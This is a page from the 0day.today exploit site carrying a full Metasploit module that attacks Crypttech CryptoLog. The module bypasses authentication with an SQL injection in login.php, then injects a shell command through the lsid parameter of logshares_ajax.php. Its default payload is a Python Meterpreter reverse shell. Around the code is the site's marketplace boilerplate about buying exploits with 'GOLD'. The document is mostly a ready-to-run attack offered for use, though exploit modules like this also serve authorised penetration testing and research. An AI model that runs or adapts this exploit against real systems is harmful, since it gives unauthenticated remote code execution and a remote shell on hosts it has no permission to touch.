0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Crypttech CryptoLog Remote Code Execution Exploit
[##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Crypttech CryptoLog Remote Code Execution",
'Description' => %q{
This module exploits the sql injection and command injection vulnerability of CryptoLog. An un-authenticated user can execute a
terminal command under the context of the web user.
login.php endpoint is responsible for login process. One of the user supplied parameter is used by the application without input validation
and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session.
logshares_ajax.php endpoint is responsible for executing an operation system command. It's not possible to access this endpoint without having
a valid session. One user parameter is used by the application while executing operating system command which cause a command injection issue.
Combining these vulnerabilities gives us opportunity execute operation system command under the context of the web user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/']
],
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => "May 3 2017",
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable CryptoLog instance', '/'])
]
)
end
def bypass_login
r = rand_text_alpha(15)
i = rand_text_numeric(5)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'cryptolog', 'login.php'),
'vars_get' => {
'act' => 'login'
},
'vars_post' => {
'user' => "' OR #{i}=#{i}#",
'pass' => "#{r}"
}
})
if res && res.code == 302 && res.headers.include?('Set-Cookie')
res.get_cookies
else
nil
end
end
def check
if bypass_login.nil?
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Appears
end
end
def exploit
print_status("Bypassing login by exploiting SQLi flaw")
cookie = bypass_login
if cookie.nil?
fail_with(Failure::Unknown, "Something went wrong.")
end
print_good("Successfully logged in")
print_status("Exploiting command injection flaw")
r = rand_text_alpha(15)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'cryptolog', 'logshares_ajax.php'),
'cookie' => cookie,
'vars_post' => {
'opt' => "check",
'lsid' => "$(python -c \"#{payload.encoded}\")",
'lssharetype' => "#{r}"
}
})
end
end
# 0day.today [2024-11-15] #